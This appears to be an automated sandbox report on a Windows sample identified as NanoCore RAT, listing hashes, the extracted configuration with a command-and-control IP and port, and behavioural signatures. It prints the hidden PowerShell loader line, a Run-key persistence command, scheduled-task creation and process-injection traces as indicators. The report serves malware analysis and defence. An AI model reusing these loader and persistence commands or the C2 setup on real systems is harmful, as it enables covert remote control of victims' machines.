Analysis
-
max time kernel
118s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
16-05-2024 13:37
Static task
static1
Behavioral task
behavioral1
Sample
e0dfee6241128b7395b5fd0d8f6ebe20_NeikiAnalytics.exe
Resource
win7-20240221-en
General
-
Target
e0dfee6241128b7395b5fd0d8f6ebe20_NeikiAnalytics.exe
-
Size
689KB
-
MD5
e0dfee6241128b7395b5fd0d8f6ebe20
-
SHA1
a1351dfa6c71e46c155f43e91538af2ababa5c5a
-
SHA256
a7904a9abf1b208434c7e06b7d7c0d86ff150660b436eebd5d2a837c1bc51e21
-
SHA512
06c609efa598c9df65cd2339dfa96d66658030fe9066daa7936a93de36c9026d822a7692f90e94b107b5fd7c6744091d7de5d943289f9078fa4aff44ca08e3b2
-
SSDEEP
12288:BEwtNzCu2HjdSqvXO6KoDP46aJkOReOjDSIWzRgmYW9+:6y/2DB+8XfORecSISRNYW9+
Malware Config
Extracted
nanocore
1.2.2.0
184.75.223.235:7425
08ef4235-7a50-4f21-9618-7cf8d1e59e43
-
activate_away_mode
true
- backup_connection_host
-
backup_dns_server
8.8.4.4
-
buffer_size
65535
-
build_time
2024-02-09T12:58:05.780785736Z
-
bypass_user_account_control
false
-
bypass_user_account_control_data
PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTE2Ij8+DQo8VGFzayB2ZXJzaW9uPSIxLjIiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmRvd3MvMjAwNC8wMi9taXQvdGFzayI+DQogIDxSZWdpc3RyYXRpb25JbmZvIC8+DQogIDxUcmlnZ2VycyAvPg0KICA8UHJpbmNpcGFscz4NCiAgICA8UHJpbmNpcGFsIGlkPSJBdXRob3IiPg0KICAgICAgPExvZ29uVHlwZT5JbnRlcmFjdGl2ZVRva2VuPC9Mb2dvblR5cGU+DQogICAgICA8UnVuTGV2ZWw+SGlnaGVzdEF2YWlsYWJsZTwvUnVuTGV2ZWw+DQogICAgPC9QcmluY2lwYWw+DQogIDwvUHJpbmNpcGFscz4NCiAgPFNldHRpbmdzPg0KICAgIDxNdWx0aXBsZUluc3RhbmNlc1BvbGljeT5QYXJhbGxlbDwvTXVsdGlwbGVJbnN0YW5jZXNQb2xpY3k+DQogICAgPERpc2FsbG93U3RhcnRJZk9uQmF0dGVyaWVzPmZhbHNlPC9EaXNhbGxvd1N0YXJ0SWZPbkJhdHRlcmllcz4NCiAgICA8U3RvcElmR29pbmdPbkJhdHRlcmllcz5mYWxzZTwvU3RvcElmR29pbmdPbkJhdHRlcmllcz4NCiAgICA8QWxsb3dIYXJkVGVybWluYXRlPnRydWU8L0FsbG93SGFyZFRlcm1pbmF0ZT4NCiAgICA8U3RhcnRXaGVuQXZhaWxhYmxlPmZhbHNlPC9TdGFydFdoZW5BdmFpbGFibGU+DQogICAgPFJ1bk9ubHlJZk5ldHdvcmtBdmFpbGFibGU+ZmFsc2U8L1J1bk9ubHlJZk5ldHdvcmtBdmFpbGFibGU+DQogICAgPElkbGVTZXR0aW5ncz4NCiAgICAgIDxTdG9wT25JZGxlRW5kPmZhbHNlPC9TdG9wT25JZGxlRW5kPg0KICAgICAgPFJlc3RhcnRPbklkbGU+ZmFsc2U8L1Jlc3RhcnRPbklkbGU+DQogICAgPC9JZGxlU2V0dGluZ3M+DQogICAgPEFsbG93U3RhcnRPbkRlbWFuZD50cnVlPC9BbGxvd1N0YXJ0T25EZW1hbmQ+DQogICAgPEVuYWJsZWQ+dHJ1ZTwvRW5hYmxlZD4NCiAgICA8SGlkZGVuPmZhbHNlPC9IaWRkZW4+DQogICAgPFJ1bk9ubHlJZklkbGU+ZmFsc2U8L1J1bk9ubHlJZklkbGU+DQogICAgPFdha2VUb1J1bj5mYWxzZTwvV2FrZVRvUnVuPg0KICAgIDxFeGVjdXRpb25UaW1lTGltaXQ+UFQwUzwvRXhlY3V0aW9uVGltZUxpbWl0Pg0KICAgIDxQcmlvcml0eT40PC9Qcmlvcml0eT4NCiAgPC9TZXR0aW5ncz4NCiAgPEFjdGlvbnMgQ29udGV4dD0iQXV0aG9yIj4NCiAgICA8RXhlYz4NCiAgICAgIDxDb21tYW5kPiIjRVhFQ1VUQUJMRVBBVEgiPC9Db21tYW5kPg0KICAgICAgPEFyZ3VtZW50cz4kKEFyZzApPC9Bcmd1bWVudHM+DQogICAgPC9FeGVjPg0KICA8L0FjdGlvbnM+DQo8L1Rhc2s+
-
clear_access_control
true
-
clear_zone_identifier
false
-
connect_delay
4000
-
connection_port
7425
-
default_group
Default
-
enable_debug_mode
true
-
gc_threshold
1.048576e+07
-
keep_alive_timeout
30000
-
keyboard_logging
false
-
lan_timeout
2500
-
max_packet_size
1.048576e+07
-
mutex
08ef4235-7a50-4f21-9618-7cf8d1e59e43
-
mutex_timeout
5000
-
prevent_system_sleep
false
-
primary_connection_host
184.75.223.235
-
primary_dns_server
8.8.8.8
-
request_elevation
true
-
restart_delay
5000
-
run_delay
0
-
run_on_startup
false
-
set_critical_process
true
-
timeout_interval
5000
-
use_custom_dns_server
false
-
version
1.2.2.0
-
wan_timeout
8000
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
reg.exeImagingDevices.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Run\Dveskolen = "%Shoresman% -windowstyle minimized $Devoto=(Get-ItemProperty -Path 'HKCU:\\Ionized\\').Arbejdspligt;%Shoresman% ($Devoto)" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\DHCP Host = "C:\\Program Files (x86)\\DHCP Host\\dhcphost.exe" ImagingDevices.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes:
ImagingDevices.exepid process 2552 ImagingDevices.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exeImagingDevices.exepid process 2904 powershell.exe 2552 ImagingDevices.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 2904 set thread context of 2552 2904 powershell.exe ImagingDevices.exe -
Drops file in Program Files directory 2 IoCs
Processes:
ImagingDevices.exedescription ioc process File created C:\Program Files (x86)\DHCP Host\dhcphost.exe ImagingDevices.exe File opened for modification C:\Program Files (x86)\DHCP Host\dhcphost.exe ImagingDevices.exe -
Drops file in Windows directory 1 IoCs
Processes:
e0dfee6241128b7395b5fd0d8f6ebe20_NeikiAnalytics.exedescription ioc process File opened for modification C:\Windows\Ligaturers216\irkas.unm e0dfee6241128b7395b5fd0d8f6ebe20_NeikiAnalytics.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 1652 schtasks.exe 2256 schtasks.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepid process 2904 powershell.exe 2904 powershell.exe 2904 powershell.exe 2904 powershell.exe 2904 powershell.exe 2904 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid process 2904 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2904 powershell.exe -
Suspicious use of WriteProcessMemory 30 IoCs
Processes:
e0dfee6241128b7395b5fd0d8f6ebe20_NeikiAnalytics.exepowershell.exeImagingDevices.execmd.exedescription pid process target process PID 2240 wrote to memory of 2904 2240 e0dfee6241128b7395b5fd0d8f6ebe20_NeikiAnalytics.exe powershell.exe PID 2240 wrote to memory of 2904 2240 e0dfee6241128b7395b5fd0d8f6ebe20_NeikiAnalytics.exe powershell.exe PID 2240 wrote to memory of 2904 2240 e0dfee6241128b7395b5fd0d8f6ebe20_NeikiAnalytics.exe powershell.exe PID 2240 wrote to memory of 2904 2240 e0dfee6241128b7395b5fd0d8f6ebe20_NeikiAnalytics.exe powershell.exe PID 2904 wrote to memory of 2584 2904 powershell.exe cmd.exe PID 2904 wrote to memory of 2584 2904 powershell.exe cmd.exe PID 2904 wrote to memory of 2584 2904 powershell.exe cmd.exe PID 2904 wrote to memory of 2584 2904 powershell.exe cmd.exe PID 2904 wrote to memory of 2552 2904 powershell.exe ImagingDevices.exe PID 2904 wrote to memory of 2552 2904 powershell.exe ImagingDevices.exe PID 2904 wrote to memory of 2552 2904 powershell.exe ImagingDevices.exe PID 2904 wrote to memory of 2552 2904 powershell.exe ImagingDevices.exe PID 2904 wrote to memory of 2552 2904 powershell.exe ImagingDevices.exe PID 2904 wrote to memory of 2552 2904 powershell.exe ImagingDevices.exe PID 2552 wrote to memory of 2492 2552 ImagingDevices.exe cmd.exe PID 2552 wrote to memory of 2492 2552 ImagingDevices.exe cmd.exe PID 2552 wrote to memory of 2492 2552 ImagingDevices.exe cmd.exe PID 2552 wrote to memory of 2492 2552 ImagingDevices.exe cmd.exe PID 2492 wrote to memory of 2424 2492 cmd.exe reg.exe PID 2492 wrote to memory of 2424 2492 cmd.exe reg.exe PID 2492 wrote to memory of 2424 2492 cmd.exe reg.exe PID 2492 wrote to memory of 2424 2492 cmd.exe reg.exe PID 2552 wrote to memory of 2256 2552 ImagingDevices.exe schtasks.exe PID 2552 wrote to memory of 2256 2552 ImagingDevices.exe schtasks.exe PID 2552 wrote to memory of 2256 2552 ImagingDevices.exe schtasks.exe PID 2552 wrote to memory of 2256 2552 ImagingDevices.exe schtasks.exe PID 2552 wrote to memory of 1652 2552 ImagingDevices.exe schtasks.exe PID 2552 wrote to memory of 1652 2552 ImagingDevices.exe schtasks.exe PID 2552 wrote to memory of 1652 2552 ImagingDevices.exe schtasks.exe PID 2552 wrote to memory of 1652 2552 ImagingDevices.exe schtasks.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\e0dfee6241128b7395b5fd0d8f6ebe20_NeikiAnalytics.exe"C:\Users\Admin\AppData\Local\Temp\e0dfee6241128b7395b5fd0d8f6ebe20_NeikiAnalytics.exe"1⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Hndelig=Get-Content 'C:\Users\Admin\AppData\Roaming\archprimate\sensationslysten\rippon.Ion';$Geocyclic=$Hndelig.SubString(53435,3);.$Geocyclic($Hndelig)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/c set /A 1^^0"3⤵
-
C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"3⤵
- Adds Run key to start application
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Dveskolen" /t REG_EXPAND_SZ /d "%Shoresman% -windowstyle minimized $Devoto=(Get-ItemProperty -Path 'HKCU:\Ionized\').Arbejdspligt;%Shoresman% ($Devoto)"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Dveskolen" /t REG_EXPAND_SZ /d "%Shoresman% -windowstyle minimized $Devoto=(Get-ItemProperty -Path 'HKCU:\Ionized\').Arbejdspligt;%Shoresman% ($Devoto)"5⤵
- Adds Run key to start application
- Modifies registry key
-
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /create /f /tn "DHCP Host" /xml "C:\Users\Admin\AppData\Local\Temp\tmp49FD.tmp"4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /create /f /tn "DHCP Host Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmp4A5C.tmp"4⤵
- Creates scheduled task(s)
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\tmp49FD.tmpFilesize
1KB
MD571ead0a0a3d5f5ab1c6fe7e937fbb0a7
SHA15ce6d119d57d1e536f5f8fe9b88e84bff5bc65f4
SHA256320e3d1c9de524bd09da80c102590ca1de02878947a5bd9cf6ce41ec80d627ef
SHA5125ff26e793041c37dee51b336e4b82bfc42b5a132b5a1bb975c7e201bedb3a384f3c44ed560b800a0b0830d2eaebd671288ab47f06cfe553da5a99b29ebeab3d0
-
C:\Users\Admin\AppData\Local\Temp\tmp4A5C.tmpFilesize
1KB
MD50479d5f304ef2d7e3c15fb24a99f88c1
SHA18edbb1450a656fac5f5e96779ffe440ee8c1aec9
SHA256112557c2b2d0c669a3b115129dc32f005341e965330fa8f2ad3e5de1926594bc
SHA512537e8d87e5cd975f0e69bb145f81d6e9d7b0d82eed143ac351304ea38577137386a51fdb7357ec6d641eb04ff5f51e249bba2db8a4b5bf2934d561394a4a3f15
-
C:\Users\Admin\AppData\Roaming\archprimate\sensationslysten\Appliceringernes.BraFilesize
327KB
MD53b52e8ccc5c3e79f2c3bd9878f7c72bd
SHA1d341fa8bdab55d08c942d45bd0cd2cf11d5b26e4
SHA256c5426f693d6484c5e42a66d03f3422587a4b328dc8432f305458d1e0f3e1ee78
SHA5126c78f6d5f1e5e4f983718e78fca14bab3e17c753cabe36c2f4e95be0406acdd32d980e2328640acb9eba439c26b5d268a1fbcfc3b4d5abf7970064f5b286dd19
-
C:\Users\Admin\AppData\Roaming\archprimate\sensationslysten\rippon.IonFilesize
52KB
MD51067aadf3627bd86f4048db52f577636
SHA1682d902c4223a31fb3abf3236194b177813d662f
SHA2560b4823813f85cbf0259d04a24fa6ee9dc00c612896201fdf1793928a3883c0d4
SHA512d9331366473d373535cca3db7b364fe3371cdef889be61cd052249ee42d1d1aae8da696dc88e2094bfda8eda2cda1b6da36e16cf5e5f92d66296941ec6aca377
-
memory/2552-30-0x0000000000980000-0x00000000019E2000-memory.dmpFilesize
16.4MB
-
memory/2552-32-0x0000000000980000-0x00000000009BA000-memory.dmpFilesize
232KB
-
memory/2552-40-0x000000001DC10000-0x000000001DC1A000-memory.dmpFilesize
40KB
-
memory/2904-8-0x00000000065B0000-0x00000000071C5000-memory.dmpFilesize
12.1MB